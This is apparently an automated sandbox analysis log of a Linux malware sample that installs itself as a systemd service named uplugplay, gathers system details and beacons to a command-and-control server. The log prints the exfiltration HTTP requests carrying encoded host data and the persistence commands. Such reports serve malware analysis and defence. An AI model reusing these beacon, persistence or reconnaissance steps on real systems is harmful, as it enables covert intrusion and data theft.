                  Mar 31, 2025 13:34:00.479818106 CEST44998443192.168.2.23199.232.38.49
                  Mar 31, 2025 13:34:00.498155117 CEST44344998199.232.38.49192.168.2.23
                  Mar 31, 2025 13:34:00.603895903 CEST44998443192.168.2.23199.232.38.49
                  Mar 31, 2025 13:34:01.038574934 CEST44344998199.232.38.49192.168.2.23
                  Mar 31, 2025 13:34:01.038624048 CEST44998443192.168.2.23199.232.38.49
                  Mar 31, 2025 13:34:01.045134068 CEST44998443192.168.2.23199.232.38.49
                  Mar 31, 2025 13:34:01.149629116 CEST44344998199.232.38.49192.168.2.23
                  Mar 31, 2025 13:34:01.149785995 CEST44344998199.232.38.49192.168.2.23
                  Mar 31, 2025 13:34:01.166738987 CEST44344998199.232.38.49192.168.2.23
                  Mar 31, 2025 13:34:01.166847944 CEST44998443192.168.2.23199.232.38.49
                  Mar 31, 2025 13:34:06.850440025 CEST44998443192.168.2.23199.232.38.49
                  Mar 31, 2025 13:34:06.850440025 CEST44998443192.168.2.23199.232.38.49
                  Mar 31, 2025 13:34:06.953593969 CEST44344998199.232.38.49192.168.2.23
                  Mar 31, 2025 13:34:06.953610897 CEST44344998199.232.38.49192.168.2.23
                  Mar 31, 2025 13:34:06.953622103 CEST44344998199.232.38.49192.168.2.23
                  Mar 31, 2025 13:34:06.953743935 CEST44998443192.168.2.23199.232.38.49
                  Mar 31, 2025 13:34:08.477663994 CEST5830480192.168.2.23152.36.128.18
                  Mar 31, 2025 13:34:08.619585991 CEST8058304152.36.128.18192.168.2.23
                  Mar 31, 2025 13:34:08.619669914 CEST5830480192.168.2.23152.36.128.18
                  Mar 31, 2025 13:34:08.780607939 CEST5830480192.168.2.23152.36.128.18
                  Mar 31, 2025 13:34:08.969314098 CEST8058304152.36.128.18192.168.2.23
                  Mar 31, 2025 13:34:09.008744955 CEST8058304152.36.128.18192.168.2.23
                  Mar 31, 2025 13:34:09.010173082 CEST5830480192.168.2.23152.36.128.18
                  Mar 31, 2025 13:34:09.028008938 CEST5830480192.168.2.23152.36.128.18
                  Mar 31, 2025 13:34:09.063832998 CEST8058304152.36.128.18192.168.2.23
                  Mar 31, 2025 13:34:09.063889980 CEST5830480192.168.2.23152.36.128.18
                  Mar 31, 2025 13:34:09.172946930 CEST8058304152.36.128.18192.168.2.23
                  Mar 31, 2025 13:34:14.493937016 CEST43928443192.168.2.2391.189.91.42
                  Mar 31, 2025 13:34:15.849706888 CEST5830680192.168.2.23152.36.128.18
                  Mar 31, 2025 13:34:15.988147020 CEST8058306152.36.128.18192.168.2.23
                  Mar 31, 2025 13:34:15.988478899 CEST5830680192.168.2.23152.36.128.18
                  Mar 31, 2025 13:34:15.990279913 CEST5830680192.168.2.23152.36.128.18
                  Mar 31, 2025 13:34:16.172121048 CEST8058306152.36.128.18192.168.2.23
                  Mar 31, 2025 13:34:16.234800100 CEST8058306152.36.128.18192.168.2.23
                  Mar 31, 2025 13:34:16.235086918 CEST5830680192.168.2.23152.36.128.18
                  Mar 31, 2025 13:34:16.235809088 CEST5830680192.168.2.23152.36.128.18
                  Mar 31, 2025 13:34:16.381218910 CEST8058306152.36.128.18192.168.2.23
                  Mar 31, 2025 13:34:16.765515089 CEST8058306152.36.128.18192.168.2.23
                  Mar 31, 2025 13:34:16.765712976 CEST5830680192.168.2.23152.36.128.18
                  Mar 31, 2025 13:34:24.732601881 CEST42836443192.168.2.2391.189.91.43
                  Mar 31, 2025 13:34:30.875890017 CEST4251680192.168.2.23109.202.202.202
                  Mar 31, 2025 13:34:55.448420048 CEST43928443192.168.2.2391.189.91.42
                  Mar 31, 2025 13:35:15.925632000 CEST42836443192.168.2.2391.189.91.43

                  HTTP Request Dependency Graph

                  • 152.36.128.18

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination Port
                  0192.168.2.2358304152.36.128.1880
                  TimestampBytes transferredDirectionData
                  Mar 31, 2025 13:34:08.780607939 CEST75OUTGET /cgi-bin/p.cgi?r=8&i=W40DBT2U1D37V673 HTTP/1.0
                  Host: 152.36.128.18
                  Mar 31, 2025 13:34:09.008744955 CEST179INHTTP/1.1 200 OK
                  Date: Mon, 31 Mar 2025 11:34:08 GMT
                  Server: Apache/2.4.41 (Win64)
                  Content-Length: 7
                  Connection: close
                  Content-Type: text/html; charset=windows-1251
                  Data Raw: 73 79 73 69 6e 66 6f
                  Data Ascii: sysinfo


                  Session IDSource IPSource PortDestination IPDestination Port
                  1192.168.2.2358306152.36.128.1880
                  TimestampBytes transferredDirectionData
                  Mar 31, 2025 13:34:15.990279913 CEST743OUTGET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCg0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDA2OjM0OjE0IHVwIDcgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAzLjQwLCAxLjM1LCAwLjUzfDE3NDM0MjA4NTQNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=W40DBT2U1D37V673&h=galassia&enckey=TmbdLiekzW9/hq5lwm3rcjU2VdABOdSopMttuU0H8ytJDWb2XrwvKxBq9miWReqZ7F5I6lX8mG2W4uJWg0eUNgzz2AON1JQuBzxmHUumNid6UyxTjxYN8mzz60B4UOKC7KQSrTdYYxJQos7bNwZez+xHpIHs53XTOkx1hCG1wJQ= HTTP/1.0
                  Host: 152.36.128.18
                  Mar 31, 2025 13:34:16.234800100 CEST224INHTTP/1.1 200 OK
                  Date: Mon, 31 Mar 2025 11:34:16 GMT
                  Server: Apache/2.4.41 (Win64)
                  Content-Length: 3
                  Connection: close
                  Content-Type: text/html; charset=windows-1251
                  Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a
                  Data Ascii: ok!Content-type: text/html; charset=windows-1251


                  System Behavior

                  General

                  Start time (UTC):11:33:52
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:/tmp/na.elf
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  File Activities

                  Process Activities

                  System Activities


                  General

                  Start time (UTC):11:33:52
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:33:52
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "pgrep na.elf"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:33:52
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:33:52
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/pgrep
                  Arguments:pgrep na.elf
                  File size:30968 bytes
                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                  File Activities


                  General

                  Start time (UTC):11:33:54
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:33:54
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "pidof na.elf"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:33:54
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:33:54
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/pidof
                  Arguments:pidof na.elf
                  File size:27016 bytes
                  MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                  File Activities


                  General

                  Start time (UTC):11:33:55
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:33:55
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "pgrep uplugplay"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:33:55
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:33:55
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/pgrep
                  Arguments:pgrep uplugplay
                  File size:30968 bytes
                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                  File Activities


                  General

                  Start time (UTC):11:33:56
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:33:56
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "pidof uplugplay"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:33:56
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:33:56
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/pidof
                  Arguments:pidof uplugplay
                  File size:27016 bytes
                  MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                  File Activities


                  General

                  Start time (UTC):11:33:58
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:33:58
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "pgrep upnpsetup"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:33:58
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:33:58
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/pgrep
                  Arguments:pgrep upnpsetup
                  File size:30968 bytes
                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                  File Activities


                  General

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "pidof upnpsetup"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/pidof
                  Arguments:pidof upnpsetup
                  File size:27016 bytes
                  MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                  File Activities


                  General

                  Start time (UTC):11:34:03
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:34:03
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "systemctl daemon-reload"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:34:03
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:34:03
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/systemctl
                  Arguments:systemctl daemon-reload
                  File size:996584 bytes
                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                  File Activities

                  Network Activities


                  General

                  Start time (UTC):11:34:04
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:34:04
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "systemctl enable uplugplay.service"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:34:04
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:34:04
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/systemctl
                  Arguments:systemctl enable uplugplay.service
                  File size:996584 bytes
                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                  File Activities

                  Network Activities


                  General

                  Start time (UTC):11:34:05
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:34:05
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "systemctl start uplugplay.service"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/systemctl
                  Arguments:systemctl start uplugplay.service
                  File size:996584 bytes
                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                  File Activities

                  Network Activities


                  General

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/usr/libexec/fwupd/fwupd
                  Arguments:-
                  File size:260616 bytes
                  MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                  Process Activities


                  General

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/gpg
                  Arguments:/usr/bin/gpg --version
                  File size:1066992 bytes
                  MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                  File Activities

                  Network Activities


                  General

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/usr/libexec/fwupd/fwupd
                  Arguments:-
                  File size:260616 bytes
                  MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                  Process Activities


                  General

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/gpg
                  Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
                  File size:1066992 bytes
                  MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                  File Activities

                  System Activities

                  Network Activities


                  General

                  Start time (UTC):11:34:01
                  Start date (UTC):31/03/2025
                  Path:/usr/libexec/fwupd/fwupd
                  Arguments:-
                  File size:260616 bytes
                  MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                  Process Activities


                  General

                  Start time (UTC):11:34:01
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/gpg
                  Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
                  File size:1066992 bytes
                  MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                  File Activities

                  System Activities

                  Network Activities


                  General

                  Start time (UTC):11:34:01
                  Start date (UTC):31/03/2025
                  Path:/usr/libexec/fwupd/fwupd
                  Arguments:-
                  File size:260616 bytes
                  MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                  Process Activities


                  General

                  Start time (UTC):11:34:01
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/gpg
                  Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
                  File size:1066992 bytes
                  MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                  File Activities

                  System Activities

                  Network Activities


                  General

                  Start time (UTC):11:34:03
                  Start date (UTC):31/03/2025
                  Path:/usr/libexec/fwupd/fwupd
                  Arguments:-
                  File size:260616 bytes
                  MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                  Process Activities


                  General

                  Start time (UTC):11:34:03
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/gpg
                  Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
                  File size:1066992 bytes
                  MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                  File Activities

                  System Activities

                  Network Activities


                  General

                  Start time (UTC):11:34:04
                  Start date (UTC):31/03/2025
                  Path:/usr/lib/systemd/systemd
                  Arguments:-
                  File size:1620224 bytes
                  MD5 hash:9b2bec7092a40488108543f9334aab75

                  Process Activities


                  General

                  Start time (UTC):11:34:04
                  Start date (UTC):31/03/2025
                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                  File size:22760 bytes
                  MD5 hash:3633b075f40283ec938a2a6a89671b0e

                  File Activities


                  General

                  Start time (UTC):11:34:05
                  Start date (UTC):31/03/2025
                  Path:/usr/lib/systemd/systemd
                  Arguments:-
                  File size:1620224 bytes
                  MD5 hash:9b2bec7092a40488108543f9334aab75

                  Process Activities


                  General

                  Start time (UTC):11:34:05
                  Start date (UTC):31/03/2025
                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                  File size:22760 bytes
                  MD5 hash:3633b075f40283ec938a2a6a89671b0e

                  File Activities


                  General

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/usr/lib/systemd/systemd
                  Arguments:-
                  File size:1620224 bytes
                  MD5 hash:9b2bec7092a40488108543f9334aab75

                  Process Activities


                  General

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:/usr/sbin/uplugplay
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  File Activities

                  Process Activities

                  System Activities


                  General

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "/usr/sbin/uplugplay -Dcomsvc"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:/usr/sbin/uplugplay -Dcomsvc
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  File Activities

                  Process Activities

                  System Activities

                  Network Activities


                  General

                  Start time (UTC):11:34:07
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:34:07
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c hostnamectl
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:34:07
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:34:07
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/hostnamectl
                  Arguments:hostnamectl
                  File size:26848 bytes
                  MD5 hash:b1245aa6d3c28b5d5fedb2d681d32eb9

                  File Activities

                  Process Activities

                  Network Activities


                  General

                  Start time (UTC):11:34:08
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:34:08
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c hostnamectl
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:34:08
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:34:08
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/hostnamectl
                  Arguments:hostnamectl
                  File size:26848 bytes
                  MD5 hash:b1245aa6d3c28b5d5fedb2d681d32eb9

                  File Activities

                  Process Activities

                  Network Activities


                  General

                  Start time (UTC):11:34:09
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:34:09
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "dmidecode --type baseboard"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/dmidecode
                  Arguments:dmidecode --type baseboard
                  File size:121856 bytes
                  MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                  File Activities


                  General

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c uptime
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/uptime
                  Arguments:uptime
                  File size:14568 bytes
                  MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                  File Activities


                  General

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "uname -a"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/uname
                  Arguments:uname -a
                  File size:39288 bytes
                  MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                  File Activities

                  System Activities


                  General

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c dmidecode
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:34:10
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/dmidecode
                  Arguments:dmidecode
                  File size:121856 bytes
                  MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                  File Activities


                  General

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c uptime
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/uptime
                  Arguments:uptime
                  File size:14568 bytes
                  MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                  File Activities


                  General

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/usr/sbin/uplugplay
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Process Activities


                  General

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "uname -a"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  File Activities

                  Process Activities


                  General

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Process Activities


                  General

                  Start time (UTC):11:34:14
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/uname
                  Arguments:uname -a
                  File size:39288 bytes
                  MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                  File Activities

                  System Activities


                  General

                  Start time (UTC):11:34:09
                  Start date (UTC):31/03/2025
                  Path:/usr/lib/systemd/systemd
                  Arguments:-
                  File size:1620224 bytes
                  MD5 hash:9b2bec7092a40488108543f9334aab75

                  Process Activities


                  General

                  Start time (UTC):11:34:09
                  Start date (UTC):31/03/2025
                  Path:/lib/systemd/systemd-hostnamed
                  Arguments:/lib/systemd/systemd-hostnamed
                  File size:35040 bytes
                  MD5 hash:2cc8a5576629a2d5bd98e49a4b8bef65

                  File Activities

                  Process Activities

                  System Activities

                  Network Activities